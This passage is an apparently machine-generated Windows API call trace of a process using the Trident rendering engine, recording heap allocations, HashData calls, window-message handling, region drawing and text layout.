[0176.596] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0176.596] memcpy_s (in: _Destination=0xd9a240, _DestinationSize=0x118, _Source=0xd9a120, _SourceSize=0x118 | out: _Destination=0xd9a240) returned 0x0 [0176.596] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82fb0 [0176.596] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0176.596] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82fb0 | out: hHeap=0x5e0000) returned 1 [0176.596] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83190 | out: hHeap=0x5e0000) returned 1 [0176.597] GetMessageTime () returned 30893625 [0176.598] GetMessagePos () returned 0x11e01d6 [0176.598] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103e2, msg=0x105, wParam=0x1b, lParam=0xe0010001, plResult=0x19a1cc | out: plResult=0x19a1cc) returned 0x1 [0176.598] NtdllDefWindowProc_W () returned 0x0 [0176.598] GetCurrentThreadId () returned 0xb48 [0176.598] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0176.598] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0176.598] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0176.598] GetWindowLongW (hWnd=0x103e4, nIndex=-21) returned 7140024 [0176.598] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 0 [0176.598] QueryPerformanceCounter (in: lpPerformanceCount=0x19a3bc | out: lpPerformanceCount=0x19a3bc*=3099541728558) returned 1 [0176.599] RedrawWindow (hWnd=0x30316, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0x2) returned 1 [0176.599] NtdllDefWindowProc_W () returned 0x0 [0176.599] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0176.599] GetAsyncKeyState (vKey=17) returned 0 [0176.600] GetAsyncKeyState (vKey=16) returned 0 [0176.600] GetAsyncKeyState (vKey=18) returned 0 [0176.600] TranslateMessage (lpMsg=0x19a5a8) returned 1 [0176.600] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0176.600] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0176.600] GetCurrentThreadId () returned 0xb48 [0176.600] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0176.600] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0176.600] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0176.600] KillTimer (hWnd=0x30316, uIDEvent=0x2022) returned 1 [0176.600] PostMessageW (hWnd=0x30316, Msg=0x113, wParam=0x2000, lParam=0x0) returned 1 [0176.601] QueryPerformanceCounter (in: lpPerformanceCount=0x19a23c | out: lpPerformanceCount=0x19a23c*=3099541967373) returned 1 [0176.601] InitOnceExecuteOnce (in: InitOnce=0x6e89927c, InitFn=0x6dd8e660, Parameter=0x0, Context=0x0 | out: InitOnce=0x6e89927c, Parameter=0x0, Context=0x0) returned 1 [0176.601] GetFocus () returned 0x103e2 [0176.601] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0176.601] GetClientRect (in: hWnd=0x103e2, lpRect=0xcfce04 | out: lpRect=0xcfce04) returned 1 [0176.602] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0176.602] QueryPerformanceCounter (in: lpPerformanceCount=0x199d00 | out: lpPerformanceCount=0x199d00*=3099542061752) returned 1 [0176.602] GetDCEx (hWnd=0x103e2, hrgnClip=0x0, flags=0x12) returned 0x4010197 [0176.602] CreateRectRgnIndirect (lprect=0x199ca0) returned 0x19040a78 [0176.602] MapWindowPoints (in: hWndFrom=0x103e2, hWndTo=0x0, lpPoints=0x199ce0, cPoints=0x1 | out: lpPoints=0x199ce0) returned 21823995 [0176.602] GetRandomRgn (hdc=0x4010197, hrgn=0x19040a78, i=4) returned 1 [0176.602] OffsetRgn (hrgn=0x19040a78, x=-507, y=-333) returned 2 [0176.602] MapWindowPoints (in: hWndFrom=0x103e2, hWndTo=0x0, lpPoints=0x199cf0, cPoints=0x1 | out: lpPoints=0x199cf0) returned 21823995 [0176.602] GetRegionData (in: hrgn=0x19040a78, nCount=0x0, lpRgnData=0x0 | out: lpRgnData=0x0) returned 0x30 [0176.602] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x30) returned 0x9f6c1c0 [0176.602] GetRegionData (in: hrgn=0x19040a78, nCount=0x30, lpRgnData=0x9f6c1c0 | out: lpRgnData=0x9f6c1c0) returned 0x30 [0176.602] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0176.602] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f6c1c0 | out: hHeap=0x5e0000) returned 1 [0176.603] DeleteObject (ho=0x19040a78) returned 1 [0176.603] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x30) returned 0x9f6c578 [0176.603] ExtCreateRegion (lpx=0x0, nCount=0x30, lpData=0x9f6c578) returned 0x91040a6c [0176.603] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f6c578 | out: hHeap=0x5e0000) returned 1 [0176.603] SelectClipRgn (hdc=0x4010197, hrgn=0x91040a6c) returned 2 [0176.603] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x30) returned 0x9f6c3f0 [0176.603] ExtCreateRegion (lpx=0x0, nCount=0x30, lpData=0x9f6c3f0) returned 0x28040a81 [0176.603] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f6c3f0 | out: hHeap=0x5e0000) returned 1 [0176.603] ValidateRgn (hWnd=0x103e2, hRgn=0x28040a81) returned 1 [0176.603] DeleteObject (ho=0x91040a6c) returned 1 [0176.603] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0176.603] GetClientRect (in: hWnd=0x103e2, lpRect=0x199bf8 | out: lpRect=0x199bf8) returned 1 [0176.604] GetSysColor (nIndex=15) returned 0xf0f0f0 [0176.605] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x7c) returned 0x68caf8 [0176.605] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f830a0 [0176.605] HashData (in: pbData=0x9f830a0, cbData=0x1, pbHash=0x198b70, cbHash=0x2 | out: pbHash=0x198b70) returned 0x0 [0176.605] HashData (in: pbData=0x198b6c, cbData=0x4, pbHash=0x198b78, cbHash=0x2 | out: pbHash=0x198b78) returned 0x0 [0176.605] HashData (in: pbData=0x9f830a4, cbData=0xc, pbHash=0x198b74, cbHash=0x2 | out: pbHash=0x198b74) returned 0x0 [0176.605] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f830a0 | out: hHeap=0x5e0000) returned 1 [0176.605] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82f20 [0176.605] HashData (in: pbData=0x9f82f20, cbData=0x1, pbHash=0x198b70, cbHash=0x2 | out: pbHash=0x198b70) returned 0x0 [0176.605] HashData (in: pbData=0x198b6c, cbData=0x4, pbHash=0x198b78, cbHash=0x2 | out: pbHash=0x198b78) returned 0x0 [0176.605] HashData (in: pbData=0x9f82f24, cbData=0xc, pbHash=0x198b74, cbHash=0x2 | out: pbHash=0x198b74) returned 0x0 [0176.605] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82f20 | out: hHeap=0x5e0000) returned 1 [0176.605] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82fe0 [0176.605] HashData (in: pbData=0x9f82fe0, cbData=0x1, pbHash=0x198b70, cbHash=0x2 | out: pbHash=0x198b70) returned 0x0 [0176.605] HashData (in: pbData=0x198b6c, cbData=0x4, pbHash=0x198b78, cbHash=0x2 | out: pbHash=0x198b78) returned 0x0 [0176.605] HashData (in: pbData=0x9f82fe4, cbData=0xc, pbHash=0x198b74, cbHash=0x2 | out: pbHash=0x198b74) returned 0x0 [0176.605] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82fe0 | out: hHeap=0x5e0000) returned 1 [0176.605] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83028 [0176.606] HashData (in: pbData=0x9f83028, cbData=0x1, pbHash=0x198b70, cbHash=0x2 | out: pbHash=0x198b70) returned 0x0 [0176.606] HashData (in: pbData=0x198b6c, cbData=0x4, pbHash=0x198b78, cbHash=0x2 | out: pbHash=0x198b78) returned 0x0 [0176.606] HashData (in: pbData=0x9f8302c, cbData=0xc, pbHash=0x198b74, cbHash=0x2 | out: pbHash=0x198b74) returned 0x0 [0176.606] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83028 | out: hHeap=0x5e0000) returned 1 [0176.606] GetSysColor (nIndex=15) returned 0xf0f0f0 [0176.606] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82ef0 [0176.606] HashData (in: pbData=0x9f82ef0, cbData=0x1, pbHash=0x198b70, cbHash=0x2 | out: pbHash=0x198b70) returned 0x0 [0176.606] HashData (in: pbData=0x198b6c, cbData=0x4, pbHash=0x198b78, cbHash=0x2 | out: pbHash=0x198b78) returned 0x0 [0176.606] HashData (in: pbData=0x9f82ef4, cbData=0xc, pbHash=0x198b74, cbHash=0x2 | out: pbHash=0x198b74) returned 0x0 [0176.606] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82ef0 | out: hHeap=0x5e0000) returned 1 [0176.606] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f831a8 [0176.606] HashData (in: pbData=0x9f831a8, cbData=0x1, pbHash=0x198b70, cbHash=0x2 | out: pbHash=0x198b70) returned 0x0 [0176.606] HashData (in: pbData=0x198b6c, cbData=0x4, pbHash=0x198b78, cbHash=0x2 | out: pbHash=0x198b78) returned 0x0 [0176.607] HashData (in: pbData=0x9f831ac, cbData=0xc, pbHash=0x198b74, cbHash=0x2 | out: pbHash=0x198b74) returned 0x0 [0176.607] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f831a8 | out: hHeap=0x5e0000) returned 1 [0176.607] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83190 [0176.607] HashData (in: pbData=0x9f83190, cbData=0x1, pbHash=0x198488, cbHash=0x2 | out: pbHash=0x198488) returned 0x0 [0176.607] HashData (in: pbData=0x198484, cbData=0x4, pbHash=0x198490, cbHash=0x2 | out: pbHash=0x198490) returned 0x0 [0176.607] HashData (in: pbData=0x9f83194, cbData=0xc, pbHash=0x19848c, cbHash=0x2 | out: pbHash=0x19848c) returned 0x0 [0176.607] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83190 | out: hHeap=0x5e0000) returned 1 [0176.607] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82ff8 [0176.607] HashData (in: pbData=0x9f82ff8, cbData=0x1, pbHash=0x198488, cbHash=0x2 | out: pbHash=0x198488) returned 0x0 [0176.607] HashData (in: pbData=0x198484, cbData=0x4, pbHash=0x198490, cbHash=0x2 | out: pbHash=0x198490) returned 0x0 [0176.607] HashData (in: pbData=0x9f82ffc, cbData=0xc, pbHash=0x19848c, cbHash=0x2 | out: pbHash=0x19848c) returned 0x0 [0176.607] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82ff8 | out: hHeap=0x5e0000) returned 1 [0176.607] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82f98 [0176.607] HashData (in: pbData=0x9f82f98, cbData=0x1, pbHash=0x198488, cbHash=0x2 | out: pbHash=0x198488) returned 0x0 [0176.607] HashData (in: pbData=0x198484, cbData=0x4, pbHash=0x198490, cbHash=0x2 | out: pbHash=0x198490) returned 0x0 [0176.607] HashData (in: pbData=0x9f82f9c, cbData=0xc, pbHash=0x19848c, cbHash=0x2 | out: pbHash=0x19848c) returned 0x0 [0176.607] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82f98 | out: hHeap=0x5e0000) returned 1 [0176.607] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83010 [0176.607] HashData (in: pbData=0x9f83010, cbData=0x1, pbHash=0x198488, cbHash=0x2 | out: pbHash=0x198488) returned 0x0 [0176.607] HashData (in: pbData=0x198484, cbData=0x4, pbHash=0x198490, cbHash=0x2 | out: pbHash=0x198490) returned 0x0 [0176.607] HashData (in: pbData=0x9f83014, cbData=0xc, pbHash=0x19848c, cbHash=0x2 | out: pbHash=0x19848c) returned 0x0 [0176.607] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83010 | out: hHeap=0x5e0000) returned 1 [0176.608] GetSysColor (nIndex=15) returned 0xf0f0f0 [0176.608] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82f20 [0176.608] HashData (in: pbData=0x9f82f20, cbData=0x1, pbHash=0x198488, cbHash=0x2 | out: pbHash=0x198488) returned 0x0 [0176.608] HashData (in: pbData=0x198484, cbData=0x4, pbHash=0x198490, cbHash=0x2 | out: pbHash=0x198490) returned 0x0 [0176.608] HashData (in: pbData=0x9f82f24, cbData=0xc, pbHash=0x19848c, cbHash=0x2 | out: pbHash=0x19848c) returned 0x0 [0176.608] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82f20 | out: hHeap=0x5e0000) returned 1 [0176.608] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82ef0 [0176.608] HashData (in: pbData=0x9f82ef0, cbData=0x1, pbHash=0x198488, cbHash=0x2 | out: pbHash=0x198488) returned 0x0 [0176.608] HashData (in: pbData=0x198484, cbData=0x4, pbHash=0x198490, cbHash=0x2 | out: pbHash=0x198490) returned 0x0 [0176.608] HashData (in: pbData=0x9f82ef4, cbData=0xc, pbHash=0x19848c, cbHash=0x2 | out: pbHash=0x19848c) returned 0x0 [0176.608] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82ef0 | out: hHeap=0x5e0000) returned 1 [0176.608] LsSetDoc () returned 0x0 [0176.609] LsCreateLine () returned 0x0 [0176.609] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0176.609] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0176.609] LsdnFinishRegular () returned 0x0 [0176.610] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0176.610] LsdnFinishRegular () returned 0x0 [0176.610] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0176.610] LsDisplayLine () returned 0x0 [0176.610] IOleInPlaceFrame:SetMenu (This=0xd90ca0, hmenuShared=0x1004, holemenu=0x0, hwndActiveObject=0x1) returned 0x0 [0176.611] IOleInPlaceFrame:SetMenu (This=0xd90c80, hmenuShared=0x1004, holemenu=0x0, hwndActiveObject=0x0) returned 0x0 [0176.611] GetSysColor (nIndex=8) returned 0x0 [0176.611] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0176.612] GetSysColor (nIndex=8) returned 0x0 [0176.612] LsDestroyLine () returned 0x0 [0176.612] IOleInPlaceSite:CanInPlaceActivate (This=0xcfa380) returned 0x0 [0176.612] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6ce0 [0176.612] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82ef0 [0176.612] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7af8 [0176.612] HashData (in: pbData=0x9f82ef4, cbData=0x4, pbHash=0x9f82ef8, cbHash=0x2 | out: pbHash=0x9f82ef8) returned 0x0 [0176.612] HashData (in: pbData=0x6d7af8, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.612] HashData (in: pbData=0x6d7afa, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.612] HashData (in: pbData=0x6d7afc, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0176.612] HashData (in: pbData=0x6d7b04, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.612] HashData (in: pbData=0x6d7b0c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.612] HashData (in: pbData=0x6d7b14, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.612] HashData (in: pbData=0x6d7b16, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.613] HashData (in: pbData=0x6d7b18, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.613] HashData (in: pbData=0x6d7b20, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.613] HashData (in: pbData=0x197b14, cbData=0x4, pbHash=0x197b00, cbHash=0x2 | out: pbHash=0x197b00) returned 0x0 [0176.613] HashData (in: pbData=0x6d7b2c, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0176.613] HashData (in: pbData=0x6d7b34, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.614] HashData (in: pbData=0x6d7b40, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0176.614] HashData (in: pbData=0x6d7b44, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0176.614] HashData (in: pbData=0x6d7b4c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.614] HashData (in: pbData=0x6d7b58, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0176.614] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7af8 | out: hHeap=0x5e0000) returned 1 [0176.614] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82ef0 | out: hHeap=0x5e0000) returned 1 [0176.614] HashData (in: pbData=0x9ee6ce0, cbData=0x1, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0176.614] HashData (in: pbData=0x197b1c, cbData=0x4, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0176.614] HashData (in: pbData=0x9ee6ce4, cbData=0x4, pbHash=0x197b20, cbHash=0x2 | out: pbHash=0x197b20) returned 0x0 [0176.614] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6ce0 | out: hHeap=0x5e0000) returned 1 [0176.614] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6d60 [0176.614] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f830b8 [0176.614] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7858 [0176.615] HashData (in: pbData=0x9f830bc, cbData=0x4, pbHash=0x9f830c0, cbHash=0x2 | out: pbHash=0x9f830c0) returned 0x0 [0176.615] HashData (in: pbData=0x6d7858, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.615] HashData (in: pbData=0x6d785a, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.615] HashData (in: pbData=0x6d785c, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0176.615] HashData (in: pbData=0x6d7864, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.615] HashData (in: pbData=0x6d786c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.615] HashData (in: pbData=0x6d7874, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.615] HashData (in: pbData=0x6d7876, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.615] HashData (in: pbData=0x6d7878, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.615] HashData (in: pbData=0x6d7880, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.615] HashData (in: pbData=0x197b14, cbData=0x4, pbHash=0x197b00, cbHash=0x2 | out: pbHash=0x197b00) returned 0x0 [0176.615] HashData (in: pbData=0x6d788c, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0176.615] HashData (in: pbData=0x6d7894, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.615] HashData (in: pbData=0x6d78a0, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0176.615] HashData (in: pbData=0x6d78a4, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0176.615] HashData (in: pbData=0x6d78ac, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.615] HashData (in: pbData=0x6d78b8, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0176.615] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7858 | out: hHeap=0x5e0000) returned 1 [0176.616] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f830b8 | out: hHeap=0x5e0000) returned 1 [0176.616] HashData (in: pbData=0x9ee6d60, cbData=0x1, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0176.616] HashData (in: pbData=0x197b1c, cbData=0x4, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0176.616] HashData (in: pbData=0x9ee6d64, cbData=0x4, pbHash=0x197b20, cbHash=0x2 | out: pbHash=0x197b20) returned 0x0 [0176.616] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6d60 | out: hHeap=0x5e0000) returned 1 [0176.616] GetFocus () returned 0x103e2 [0176.616] GetFocus () returned 0x103e2 [0176.616] GetSysColor (nIndex=15) returned 0xf0f0f0 [0176.617] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7a88 | out: hHeap=0x5e0000) returned 1 [0176.617] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7e08 [0176.617] _CIsqrt () returned 0x407b027f [0176.617] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6d60 [0176.617] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0176.617] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0176.617] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6d60 | out: hHeap=0x5e0000) returned 1 [0176.617] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x54) returned 0x6dd9b8 [0176.617] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0176.618] HashData (in: pbData=0xd951d0, cbData=0x28, pbHash=0x19732c, cbHash=0x4 | out: pbHash=0x19732c) returned 0x0 [0176.619] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6dd9b8 | out: hHeap=0x5e0000) returned 1 [0176.619] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6d00 [0176.619] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82f20 [0176.619] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7af8 [0176.619] HashData (in: pbData=0x9f82f24, cbData=0x4, pbHash=0x9f82f28, cbHash=0x2 | out: pbHash=0x9f82f28) returned 0x0 [0176.619] HashData (in: pbData=0x6d7af8, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.619] HashData (in: pbData=0x6d7afa, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.619] HashData (in: pbData=0x6d7afc, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0176.619] HashData (in: pbData=0x6d7b04, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.619] HashData (in: pbData=0x6d7b0c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.620] HashData (in: pbData=0x6d7b14, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.620] HashData (in: pbData=0x6d7b16, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.620] HashData (in: pbData=0x6d7b18, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.620] HashData (in: pbData=0x6d7b20, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.620] HashData (in: pbData=0x197b14, cbData=0x4, pbHash=0x197b00, cbHash=0x2 | out: pbHash=0x197b00) returned 0x0 [0176.620] HashData (in: pbData=0x6d7b2c, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0176.620] HashData (in: pbData=0x6d7b34, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.620] HashData (in: pbData=0x6d7b40, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0176.620] HashData (in: pbData=0x6d7b44, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0176.620] HashData (in: pbData=0x6d7b4c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.620] HashData (in: pbData=0x6d7b58, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0176.620] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7af8 | out: hHeap=0x5e0000) returned 1 [0176.620] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82f20 | out: hHeap=0x5e0000) returned 1 [0176.620] HashData (in: pbData=0x9ee6d00, cbData=0x1, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0176.620] HashData (in: pbData=0x197b1c, cbData=0x4, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0176.620] HashData (in: pbData=0x9ee6d04, cbData=0x4, pbHash=0x197b20, cbHash=0x2 | out: pbHash=0x197b20) returned 0x0 [0176.620] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6d00 | out: hHeap=0x5e0000) returned 1 [0176.620] GetFocus () returned 0x103e2 [0176.621] GetFocus () returned 0x103e2 [0176.621] GetFocus () returned 0x103e2 [0176.621] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0176.621] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0176.621] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0176.621] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0176.621] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0176.621] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0176.622] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83130 [0176.622] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0176.622] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0176.622] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0176.622] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0176.623] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0176.623] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0176.623] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 